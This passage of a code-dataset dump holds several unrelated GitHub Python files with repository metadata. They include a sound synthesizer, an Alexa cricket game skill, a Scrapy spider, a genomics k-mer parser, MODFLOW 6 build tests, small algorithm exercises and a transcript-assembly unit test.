the form of a Track object. It accepts\nas arguments any subset of the following:\n - frequency\n - volume [1 is reasonable, 10 is max]\n - duration\n - attack [units of seconds]\n - sustain [units of seconds]\n - decay [units of seconds]\n ? bpm\n ? other...\n\n\"\"\"\n\n__all__ = [\"bell\",\"drone\"]\n\nimport numpy as np\nimport pylab as pb\nimport scipy.io.wavfile\nimport wave as kp\nimport random\n#sps=kp.sps\n\ndef bell(freq=440.,volume=1.0,duration=None,attack=0.001,sustain=None,decay=0.5,bpm=120):\n assert freq<2000., \"bells don't go that high\"\n A=10**((volume-10.0)/3)\n t=np.arange(0.0,5.0,1./kp.sps)\n data=np.zeros([len(t),2])\n data[:,0]=A*np.sin(2*np.pi*t*freq)*np.exp(-t/decay)\n data[:,1]=data[:,0]\n W=kp.Wave(data=(kp.sps,data))\n return kp.Track(Wave=W,zero=0)\n \ndef drone(freq=440.,volume=1.0,duration=4.0,attack=0.1,sustain=None,decay=0.1,bpm=120):\n assert freq<600., \"drones shouldn't be high... 
that's annoying\"\n A=10**((volume-10.0)/3)\n t_cut=duration*60./bpm\n t_end=(duration+4)*60/bpm\n t=np.arange(0.0,t_end,1./kp.sps)\n drfreq=bpm/60.*random.randint(1,2)\n depth=0.1+0.2*random.random()\n Amp=(1-depth)*A+depth*A*np.cos(2*np.pi*t*drfreq)\n dt=np.sin(2*np.pi*t*freq)*(1-np.exp(-t/attack))\n dt=Amp*dt\n dt[t>t_cut]=dt[t>t_cut]*np.exp(-(t[t>t_cut]-t_cut)/decay)\n if sustain!=None:dt*=np.exp(-t/sustain)\n data=np.zeros([len(t),2])\n data[:,0]=dt\n data[:,1]=dt\n W=kp.Wave(data=(kp.sps,data))\n return kp.Track(Wave=W,zero=0)\n \n \n \n ","repo_name":"dfm/kopy","sub_path":"kopy/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21892244118","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass PythonOrgSearch(unittest.TestCase):\n \n def setUp(self):\n self.driver = webdriver.Firefox()\n \n def test_search_in_python_org(self):\n driver = self.driver\n driver.get(\"https://hil-wsr-t-lwb01.corp.avertlabs.internal/\")\n self.assertIn(\"URL ticket submission portal\", driver.title)\n elem = driver.find_element_by_name(\"q\")\n elem.send_keys(\"pycon\")\n assert \"No results found.\" not in driver.page_source\n elem.send_keys(Keys.RETURN)\n \n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"avimehenwal/python.avimehenwal","sub_path":"src/SeleniumWebDriver/selenium_with_unittest.py","file_name":"selenium_with_unittest.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1650849393","text":"import logging\nimport random\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\n#ask_sdk_core.attributes_manager.AbstractPersistenceAdapter\nsb =SkillBuilder()\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nSKILL_NAME = \"CricVerbal\"\n\ndata_out = [\n 'Bowled!','out!','L.B.W. !','Run Out!','It was a Catch!','You are Stumped!','Outzaatt!!!','Hit Wicket!',' ',]\n\ndata_six = [\n 'Boundary!','What a shot!',' ',]\n\ndata_win = [\n 'Congratulation!', 'Bravo!', 'Hurray!', 'Yippie!', ' ',]\n\n\n#expressions for winning or losing\n#six or four\n\n@sb.request_handler(can_handle_func=is_request_type(\"LaunchRequest\"))\ndef launch_request_handler(handler_input):\n\t\"\"\"Handler for Skill Launch.\"\"\"\n\t# type: (HandlerInput) -> Response\n\tspeech_text = \"Welcome to Cricverbal. 
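The instrument functions above all follow the same recipe — a sine carrier shaped by exponential attack/decay envelopes — before wrapping the samples in the project's `Wave`/`Track` objects. The core synthesis step, stripped of those project-specific classes (illustrative parameters; 44100 Hz stands in for the module's `sps`):

```python
import numpy as np
import scipy.io.wavfile

sps = 44100                       # samples per second (assumed; kp.sps in the rack)
freq, decay, volume = 440.0, 0.5, 1.0

t = np.arange(0.0, 5.0, 1.0 / sps)
amp = 10 ** ((volume - 10.0) / 3)                                 # same volume-to-amplitude mapping
mono = amp * np.sin(2 * np.pi * freq * t) * np.exp(-t / decay)    # struck-bell shape

stereo = np.column_stack([mono, mono]).astype(np.float32)
scipy.io.wavfile.write("bell.wav", sps, stereo)   # 5 s of a decaying 440 Hz tone
```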
You can choose to Bat or Ball first\"\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tattr[\"user_score\"]=int(0)\n\tattr[\"alexa_score\"]=int(0)\n\tattr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"PlayCricverbalIntent\"))\ndef play_request_handler(handler_input):\n\t\"\"\"Handler for Skill Launch.\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tattr[\"user_score\"]=int(0)\n\tattr[\"alexa_score\"]=int(0)\n\tattr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n\tspeech_text = \"Welcome to Cricverbal. You can choose to Bat or Ball first\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"PlayAgainIntent\"))\ndef play_again_request_handler(handler_input):\n \"\"\"Handler for Skill Launch.\"\"\"\n # type: (HandlerInput) -> Response\n attr = handler_input.attributes_manager.session_attributes\n attr[\"user_choice\"]=int(0)\n attr[\"user_score\"]=int(0)\n attr[\"alexa_score\"]=int(0)\n attr[\"user_state\"]=0\t# 0 for first bat, 1 for second bat\n speech_text = \"Great! You can again choose to Bat or Ball first\"\n return handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"BatIntent\"))\ndef bat_response_handler(handler_input):\n\t\"\"\"Handler to start batting\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(1)\n\tspeech_text = \"Great Choice! You are batting now. Start saying a random number between 1 and 6\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"BallIntent\"))\ndef ball_response_handler(handler_input):\n\t\"\"\"Handler to start batting\"\"\"\n\t# type: (HandlerInput) -> Response\n\tattr = handler_input.attributes_manager.session_attributes\n\tattr[\"user_choice\"]=int(0)\n\tspeech_text = \"Great Choice! You are balling now. 
Start saying a random number between 1 and 6\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"NumberIntent\"))\ndef batting_handler(handler_input):\n\t\"\"\"Handler for batting or balling\"\"\"\n\t# type: (HandlerInput) -> Response\n\trandom_out=random.choice(data_out)\n\trandom_six=random.choice(data_six)\n\trandom_win=random.choice(data_win)\n\trandom_number=int(random.randint(1,6))\n\tattr = handler_input.attributes_manager.session_attributes\n\tslots = handler_input.request_envelope.request.intent.slots\n\tnumber_user = slots[\"number\"].value\n\tattr[\"NUMBER\"] = number_user\n\tbat_or_ball=attr.get(\"user_choice\")\n\tif (int(number_user)<1 or int(number_user)>6):\n\t\tspeech_text=\"You are supposed to choose number between 1 and 6\"\n\telif (bat_or_ball==1):\n\t\tif (random_number == int(number_user)):\n\t\t\tspeech_text = random_out + \" I also threw \"+str(random_number) + \". You are out with score {} .\".format(str(attr.get(\"user_score\")))\n\t\t\tif (attr.get(\"user_state\")==0): \n\t\t\t\tattr[\"user_choice\"]=int(0)\n\t\t\t\tspeech_text+=\"Now its your turn to bowl. Start balling by saying random number between 1 and 6\"\n\t\t\t\tattr[\"user_state\"]=1\n\t\t\telse :\n\t\t\t\tif (attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\t\tspeech_text+= random_win + \" You won by \"+ str(attr.get(\"user_score\")-(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\telif (attr.get(\"user_score\")==attr.get(\"alexa_score\")):\n\t\t\t\t\tspeech_text+=\" Its a draw!\"\n\t\t\t\telse:\n\t\t\t\t\tspeech_text+=\" You lost by \"+ str(-(attr.get(\"user_score\"))+(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\tspeech_text+=\" Would you like to play again?\"\n\t\t\t\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\t\telse:\n\t\t\tif (int(number_user)==4 or int(number_user)==6):\n\t\t\t\tspeech_text = random_six + \".I threw \"+str(random_number)+\". Continue Batting... \" \n\t\t\telse :\n\t\t\t\tspeech_text = \"I threw \"+str(random_number)+\". Continue Batting...\"\n\t\t\tattr[\"user_score\"]=int(attr.get(\"user_score\"))+int(number_user)\n\t\t\tif (attr.get(\"user_state\")==1 and attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\tspeech_text=\"I threw \"+str(random_number)+\". \" + random_win + \" You won!\"\n\t\t\t\tspeech_text+=\" Would you like to play again?\" \n\n\telif(bat_or_ball==0):\t\t\t\n\t\t\tif (random_number==int(number_user)):\n\t\t\t\tspeech_text= \"Oh no! I also threw \"+str(random_number)+\". I am out with score \"+str(attr.get(\"alexa_score\"))+\" .\"\n\t\t\t\tif (attr.get(\"user_state\")==0): \n\t\t\t\t\tattr[\"user_choice\"]=int(1)\n\t\t\t\t\tspeech_text+=\" Now its your turn to bat. 
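Beneath the Alexa plumbing, the `NumberIntent` handler implements a simple hand-cricket rule: if both sides say the same number the batter is out, otherwise the batter scores that many runs. The core loop, isolated as a hypothetical console game (not part of the skill code):

```python
import random

def play_innings(target=None):
    """One innings against a random opponent; returns the batting score."""
    score = 0
    while True:
        user = random.randint(1, 6)    # stands in for the spoken number
        alexa = random.randint(1, 6)
        if user == alexa:
            return score               # same number -> out
        score += user                  # otherwise the batter scores the runs
        if target is not None and score > target:
            return score               # chase completed early

random.seed(7)
first = play_innings()
chase = play_innings(target=first)
print("innings 1:", first, "| innings 2:", chase,
      "| winner:", "chaser" if chase > first else "setter" if first > chase else "tie")
```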
Start batting by saying a random number between 1 and 6.\"\n\t\t\t\t\tattr[\"user_state\"]=1\n\t\t\t\telse :\n\t\t\t\t\tif (attr.get(\"user_score\")>attr.get(\"alexa_score\")):\n\t\t\t\t\t\tspeech_text+= random_win+\" You won by \"+ str(attr.get(\"user_score\")-(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\t\telif (attr.get(\"user_score\")==attr.get(\"alexa_score\")):\n\t\t\t\t\t\tspeech_text+=\" Its a draw!\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tspeech_text+=\"You lost by \"+ str(-(attr.get(\"user_score\"))+(attr.get(\"alexa_score\")))+\" runs.\"\n\t\t\t\t\tspeech_text+=\" Would you like to play again?\"\n\t\t\t\t\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(False).response\n\t\t\telse:\n\t\t\t\tspeech_text=\"I scored \" + str(random_number)+\". Continue bowling...\"\n\t\t\t\tattr[\"alexa_score\"]=attr.get(\"alexa_score\")+random_number\n\t\t\t\tif (attr.get(\"user_state\")==1 and attr.get(\"user_score\") Response\n\tspeech_text=\"See you next time! Goodbye!\"\n\treturn handler_input.response_builder.speak(speech_text).set_card(SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(True).response\n\t\n\n\n\n\n#################################################################################\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.HelpIntent\"))\ndef help_intent_handler(handler_input):\n \"\"\"Handler for Help Intent.\"\"\"\n # type: (HandlerInput) -> Response\n speech_text = \"You can play cricket with me! The rules are simple....If you and I choose same number, the person batting is out! Otherwise, we will continue playing. Try saying play cricket.\"\n\n return handler_input.response_builder.speak(speech_text).ask(\n speech_text).set_card(SimpleCard(\n SKILL_NAME, speech_text)).response\n\n\n@sb.request_handler(\n can_handle_func=lambda handler_input:\n is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n is_intent_name(\"AMAZON.StopIntent\")(handler_input))\ndef cancel_and_stop_intent_handler(handler_input):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n # type: (HandlerInput) -> Response\n speech_text = \"Goodbye!\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(SKILL_NAME, speech_text)).response\n\n\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.FallbackIntent\"))\ndef fallback_handler(handler_input):\n \"\"\"AMAZON.FallbackIntent is only available in en-US locale.\n This handler will not be triggered except in that locale,\n so it is safe to deploy on any locale.\n \"\"\"\n # type: (HandlerInput) -> Response\n speech = (\n \"The CricVerbal skill can't help you with that. \"\n \"You can say say Bat or Ball\")\n reprompt = \"You can say Bat!!\"\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response\n\n\n@sb.request_handler(can_handle_func=is_request_type(\"SessionEndedRequest\"))\ndef session_ended_request_handler(handler_input):\n \"\"\"Handler for Session End.\"\"\"\n # type: (HandlerInput) -> Response\n return handler_input.response_builder.response\n\n\n@sb.exception_handler(can_handle_func=lambda i, e: True)\ndef all_exception_handler(handler_input, exception):\n \"\"\"Catch all exception handler, log exception and\n respond with custom message.\n \"\"\"\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, there was some problem. 
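All of the skill's game state (scores, whose innings it is) lives in `handler_input.attributes_manager.session_attributes`, a plain dict that persists across turns within one session. A self-contained illustration with stubbed objects (the `Fake*` classes are fabricated for the demo; the real ones come from the ask-sdk runtime):

```python
class FakeAttributesManager:
    def __init__(self):
        self.session_attributes = {}   # per-session scratch space

class FakeHandlerInput:
    def __init__(self):
        self.attributes_manager = FakeAttributesManager()

def bump_score(handler_input, runs):
    """Accumulate a per-session counter the way the skill tracks scores."""
    attr = handler_input.attributes_manager.session_attributes
    attr["user_score"] = attr.get("user_score", 0) + runs
    return attr["user_score"]

hi = FakeHandlerInput()
for runs in (4, 6, 2):
    bump_score(hi, runs)
print(hi.attributes_manager.session_attributes)   # {'user_score': 12}
```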
Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response\n\n\nlambda_handler = sb.lambda_handler()\n","repo_name":"sundeshgupta/alexa-skill","sub_path":"lambda/py/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":10045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30476179378","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom scralab.items import ScralabItem\n\nclass Labspd1Spider(scrapy.Spider):\n name = 'labspd1'\n allowed_domains = ['lab.scrapyd.cn']\n start_urls = ['http://lab.scrapyd.cn/']\n\n def parse(self, response):\n\n quote = response.css(\"div.quote\")\n\n item =ScralabItem()\n\n for i in quote:\n item['cont'] = i.css(\".text::text\").extract_first()\n tags = i.css(\".tags .tag::text\").extract()\n\n item['tag'] = \",\".join(tags)\n\n yield item\n\n next_page = response.css(\"li.next a::attr(href)\").extract_first()\n if next_page is not None:\n next_page = response.urljoin(next_page)\n yield scrapy.Request(next_page, callback=self.parse)\n","repo_name":"1AKO1/2020shixun","sub_path":"other/Tesla/ScrapyPro/scralab/scralab/spiders/labspd1.py","file_name":"labspd1.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27118693387","text":"# -*- coding=utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport pysam as ps\nfrom random import sample\n\nsamfile = ps.AlignmentFile('data/nanopore_sorted.bam','rb')\n\nstart = 0\nend = start + 1000\nk = 12\nprint('k =', k)\n\nkmers = {} \nindex_rows = []\nmetadata = {}\nfor read in samfile.fetch('NC_000913.3', start, end):\n read_sequence = read.query_sequence\n read_id = read.query_name\n index_rows = index_rows + [read_id]\n algn_start = read.query_alignment_start\n if read_sequence is not None:\n for i in range(len(read_sequence) - k + 1):\n kmer = read_sequence[i: i+k]\n current_pos = algn_start+i\n if kmer in metadata:\n # get the kmer's last appearance position\n latest_pos = metadata[kmer][-1]\n #update metadata\n #the smaller the distance between repeating kmers\n #the fewer informative positions we have\n if current_pos - latest_pos > 500:\n # significant gap between duplicate kmer\n # create new kmer (crude threshold)\n kmers[f'{kmer}_{current_pos}'] = {read_id}\n metadata[kmer] = np.append(metadata[kmer],[current_pos])\n else:\n #get the nearest pos\n idx = (np.abs(metadata[kmer]-current_pos)).argmin()\n kmers[f'{kmer}_{metadata[kmer][idx]}'].add(read_id)\n else:\n #create a tuple of metadata and set of reads\n kmers[f'{kmer}_{current_pos}'] = {read_id}\n metadata[kmer] = np.array([current_pos])\n\nprint('Total number of read sequence in range:', len(index_rows))\nprint('Total number of kmer:', len(kmers))\nprint('Total number of kmer (without repeating):', len(metadata))\n\n# look for suspicious position\nprint('Identify suspicious position...')\nsus = [key for key, value in kmers.items() if len(value)>=(len(index_rows)/3)]\nprint('Number of informative position:', len(sus))\n\nmatrix = pd.DataFrame([],index = index_rows, columns= sus)\nprint('Generating matrix...')\nfor key in sus:\n matrix.loc[list(kmers[key]),[key]] = 1\n\n#fill empty positions with 0\nmatrix = matrix.fillna(0)\n\nprint('Exporting to csv...')\nprint('Dimension of matrix:', 
matrix.shape)\nmatrix.to_csv('data/kmers_problem.csv')","repo_name":"tmtktmtk/haploytyping_mip_gurobi","sub_path":"parser_kmers.py","file_name":"parser_kmers.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36747013078","text":"import contextlib\nimport os\nimport shutil\nimport sys\nimport time\n\nimport flopy\nimport pytest\n\nimport pymake\n\n# define program data\ntarget = \"mf6\"\nif sys.platform.lower() == \"win32\":\n target += \".exe\"\n\nsharedobject_target = \"libmf6\"\nif sys.platform.lower() == \"win32\":\n sharedobject_target += \".dll\"\nelif sys.platform.lower() == \"darwin\":\n sharedobject_target += \".dylib\"\nelse:\n sharedobject_target += \".so\"\n\n# get program dictionary\nprog_dict = pymake.usgs_program_data.get_target(target)\n\n# set up paths\ndstpth = os.path.join(f\"temp_{os.path.basename(__file__).replace('.py', '')}\")\nif not os.path.exists(dstpth):\n os.makedirs(dstpth, exist_ok=True)\n\nmf6ver = prog_dict.version\nmf6pth = os.path.join(dstpth, prog_dict.dirname)\nepth = os.path.join(dstpth, target)\n\n# set fpth based on current path\nif os.path.basename(os.path.normpath(os.getcwd())) == \"autotest\":\n fpth = os.path.abspath(\n os.path.join(\"temp\", \"mf6examples\", \"mf6examples.txt\")\n )\nelse:\n fpth = os.path.abspath(\n os.path.join(\"autotest\", \"temp\", \"mf6examples\", \"mf6examples.txt\")\n )\nif os.path.isfile(fpth):\n with open(fpth) as f:\n lines = f.read().splitlines()\n sim_dirs = [line for line in lines if len(line) > 0]\nelse:\n sim_dirs = []\n\npm = pymake.Pymake(verbose=True)\npm.target = target\npm.appdir = dstpth\npm.makefile = True\npm.makeclean = True\npm.makefiledir = dstpth\npm.inplace = True\npm.networkx = True\n\n\n@contextlib.contextmanager\ndef working_directory(path):\n \"\"\"Changes working directory and returns to previous on exit.\"\"\"\n prev_cwd = os.getcwd()\n os.chdir(path)\n try:\n yield\n finally:\n os.chdir(prev_cwd)\n\n\ndef build_with_makefile(makefile_target):\n success = False\n with working_directory(dstpth):\n if os.path.isfile(\"makefile\"):\n # wait to delete on windows\n if sys.platform.lower() == \"win32\":\n time.sleep(6)\n\n # clean prior to make\n print(f\"clean {makefile_target} with makefile\")\n os.system(\"make clean\")\n\n # build MODFLOW 6 with makefile\n print(f\"build {makefile_target} with makefile\")\n return_code = os.system(\"make\")\n\n # test if running on Windows with ifort, if True the makefile\n # should fail\n if sys.platform.lower() == \"win32\" and pm.fc == \"ifort\":\n if return_code != 0:\n success = True\n else:\n success = False\n # verify that target was made\n else:\n success = os.path.isfile(makefile_target)\n\n return success\n\n\ndef clean_up():\n # clean up makefile\n print(\"Removing makefile\")\n files = [\n os.path.join(dstpth, file_name)\n for file_name in (\"makefile\", \"makedefaults\")\n ]\n for fpth in files:\n if os.path.isfile(fpth):\n os.remove(fpth)\n\n # finalize pymake object\n pm.finalize()\n\n if os.path.isfile(epth):\n print(\"Removing \" + target)\n os.remove(epth)\n\n print(\"Removing temporary build directories\")\n dirs_temp = [dstpth]\n for d in dirs_temp:\n if os.path.isdir(d):\n shutil.rmtree(d)\n return\n\n\ndef run_mf6(ws):\n success = False\n exe_name = os.path.abspath(epth)\n if os.path.exists(exe_name):\n # run test models\n print(f\"running model...{os.path.basename(ws)}\")\n success, buff = flopy.run_model(\n exe_name, None, model_ws=ws, 
silent=False\n )\n return success\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_download():\n # Remove the existing mf6 directory if it exists\n if os.path.isdir(mf6pth):\n shutil.rmtree(mf6pth)\n\n # download the modflow 6 release\n pm.download_target(target, download_path=dstpth)\n assert pm.download, f\"could not download {target} distribution\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_compile():\n assert pm.build() == 0, f\"could not compile {target}\"\n\n\n@pytest.mark.regression\n@pytest.mark.parametrize(\"ws\", sim_dirs)\ndef test_mf6(ws):\n assert run_mf6(ws), f\"could not run {ws}\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_makefile():\n assert build_with_makefile(\n target\n ), f\"could not compile {target} with makefile\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_sharedobject():\n pm.target = sharedobject_target\n prog_dict = pymake.usgs_program_data.get_target(pm.target)\n pm.appdir = dstpth\n pm.srcdir = os.path.join(mf6pth, prog_dict.srcdir)\n pm.srcdir2 = os.path.join(mf6pth, \"src\")\n pm.excludefiles = [os.path.join(pm.srcdir2, \"mf6.f90\")]\n pm.makefile = True\n pm.makeclean = True\n pm.sharedobject = True\n pm.inplace = True\n pm.dryrun = False\n assert pm.build() == 0, f\"could not compile {pm.target}\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_sharedobject_makefile():\n assert build_with_makefile(\n sharedobject_target\n ), f\"could not compile {sharedobject_target} with makefile\"\n\n\n@pytest.mark.base\n@pytest.mark.regression\ndef test_clean_up():\n clean_up()\n\n\nif __name__ == \"__main__\":\n test_download()\n test_compile()\n for ws in sim_dirs:\n run_mf6(ws)\n test_makefile()\n test_sharedobject()\n test_sharedobject_makefile()\n test_clean_up()\n","repo_name":"1Keanu/pymake","sub_path":"autotest/t008_test.py","file_name":"t008_test.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"15747312934","text":"'''\nMerge two sorted linked lists and return it as a new list. 
The new list should be made by splicing together the nodes of the first two lists.\n\nExample:\n\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n'''\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head = tail = next_node = None\n while l1 or l2:\n if not l1 or (l2 and l1.val >= l2.val):\n next_node = l2\n l2 = l2.next\n else:\n next_node = l1\n l1 = l1.next\n if not tail:\n head = tail = next_node\n else:\n tail.next = next_node\n tail = tail.next\n if tail:\n tail.next = None\n return head\n","repo_name":"kias-git/coding-practice","sub_path":"leetcode/algorithms/merge-two-sorted-lists.py","file_name":"merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"22017901941","text":"# Solution\n\nfrom collections import deque\nfrom copy import deepcopy\n\nN, M = map(int, input().split(' '))\nHx, Hy = map(int, input().split(' '))\nEx, Ey = map(int, input().split(' '))\narr = [list(map(int, input().split(' '))) for _ in range(N)]\ndist = [[[-1, -1] for _ in range(M)] for _ in range(N)]\n\nq = deque([[Hx - 1, Hy - 1, 0]])\ndist[Hx - 1][Hy - 1][0] = 0\nanswer = 0\nwhile q:\n x, y, z = q.popleft()\n if x == Ex - 1 and y == Ey - 1:\n answer = dist[x][y][z]\n break\n\n for dx, dy in (1, 0), (-1, 0), (0, 1), (0, -1):\n nx, ny, nz = x + dx, y + dy, z\n if nx < 0 or nx >= N or ny < 0 or ny >= M:\n continue\n if arr[nx][ny]:\n if nz:\n continue\n else:\n nz = 1\n if dist[nx][ny][nz] == -1:\n dist[nx][ny][nz] = dist[x][y][z] + 1\n q.append([nx, ny, nz])\nif not answer:\n print(-1)\nelse:\n print(answer)\n","repo_name":"wjk1011/BasicToAdvanced","sub_path":"Baekjoon/DFS_BFS/미로탈출_이찬규.py","file_name":"미로탈출_이찬규.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"23550282108","text":"#Tae Young Kevin Shin\r\n#11-22-2016 Comsc 235B\r\n#Dr. 
Christ / Changing color image to grayscale image\r\n\r\n#import graphics\r\nfrom graphics import *\r\n\r\n\r\n#Defining main function\r\ndef main():\r\n\r\n #Drawing / Pulling up given picture on graphic window\r\n win = GraphWin(\"Grayscale\",600,600)\r\n image = Image(Point(300,300), \"pikachu.gif\")\r\n image.draw(win)\r\n\r\n row = 0\r\n column = 0\r\n\r\n win.getMouse()\r\n\r\n #Starting for-loop of row and column consecutively\r\n for row in range(image.getWidth()):\r\n for column in range(image.getHeight()):\r\n r, g, b = image.getPixel(row, column)\r\n brightness = int(round(0.299 * r + 0.587 * g + 0.114 * b))\r\n image.setPixel(row, column, color_rgb(brightness, brightness, brightness))\r\n win.update()\r\n\r\n\r\n #Closing the window after one more mouse click\r\n win.getMouse()\r\n win.close()\r\n\r\nmain()\r\n\r\n","repo_name":"Python-Shin-AOCG/Programming-and-Problem-Solving","sub_path":"grayscale.py","file_name":"grayscale.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"4986126642","text":"'''\nCreated on Feb 20, 2013\n\n@author: mkiyer\n'''\nimport unittest\n\nfrom assemblyline.lib.transcript import POS_STRAND, NEG_STRAND, Exon\nfrom assemblyline.lib.assemble.transcript_graph2 import create_transcript_graphs\nfrom assemblyline.lib.assemble.assembler import assemble_transcript_graph\n\nfrom test_base import read_first_locus\n\nclass TestAssembler(unittest.TestCase):\n\n def test_assembler1(self):\n # setup correct transcripts\n PATH_ABCDE = tuple([Exon(0,100), Exon(200,300), Exon(400,500),Exon(600,700), Exon(800,900)])\n PATH_ACE = tuple([Exon(0,100), Exon(400,500), Exon(800,900)])\n PATH_ABCE = tuple([Exon(0,100), Exon(200,300), Exon(400,500), Exon(800,900)])\n PATH_ACDE = tuple([Exon(0,100), Exon(400,500),Exon(600,700), Exon(800,900)])\n # read transcripts\n transcripts = read_first_locus(\"assemble1.gtf\", score_attr=\"score\")\n tdict = dict((t.attrs['transcript_id'],t) for t in transcripts)\n # set transcript scores\n tdict[\"ABCDE\"].score = 2.0\n tdict[\"ACE\"].score = 1.0\n tdict[\"ABCE\"].score = 1.0\n tdict[\"ACDE\"].score = 1.0\n # create graphs\n GS = create_transcript_graphs('chr1', transcripts, \n create_bedgraph=False, \n bedgraph_filehs=None,\n min_trim_length=0, \n trim_utr_fraction=0.0,\n trim_intron_fraction=0.0) \n Gsub, strand, partial_paths = GS[0].Gsub, GS[0].strand, GS[0].partial_paths\n # assemble with kmax=2\n results = list(assemble_transcript_graph(Gsub, strand, partial_paths,\n user_kmax=2,\n ksensitivity=0,\n fraction_major_path=0,\n max_paths=1000))\n self.assertEqual(len(results), 2)\n self.assertEqual(tuple(results[0].path), PATH_ABCDE) \n self.assertAlmostEqual(results[0].score, 3.0, places=3) \n self.assertEqual(tuple(results[1].path), PATH_ACE) \n self.assertAlmostEqual(results[1].score, 2.0, places=3) \n # change transcript scores\n tdict[\"ABCDE\"].score = 4.0\n tdict[\"ACE\"].score = 3.0\n tdict[\"ABCE\"].score = 2.0\n tdict[\"ACDE\"].score = 1.0\n # create graphs\n GS = create_transcript_graphs('chr1', transcripts, \n create_bedgraph=False, \n bedgraph_filehs=None,\n min_trim_length=0, \n trim_utr_fraction=0.0,\n trim_intron_fraction=0.0) \n Gsub, strand, partial_paths = GS[0].Gsub, GS[0].strand, GS[0].partial_paths\n # assemble with kmax=3\n results = list(assemble_transcript_graph(Gsub, strand, partial_paths,\n user_kmax=3,\n ksensitivity=0,\n fraction_major_path=0,\n max_paths=1000))\n self.assertEqual(len(results), 4)\n 
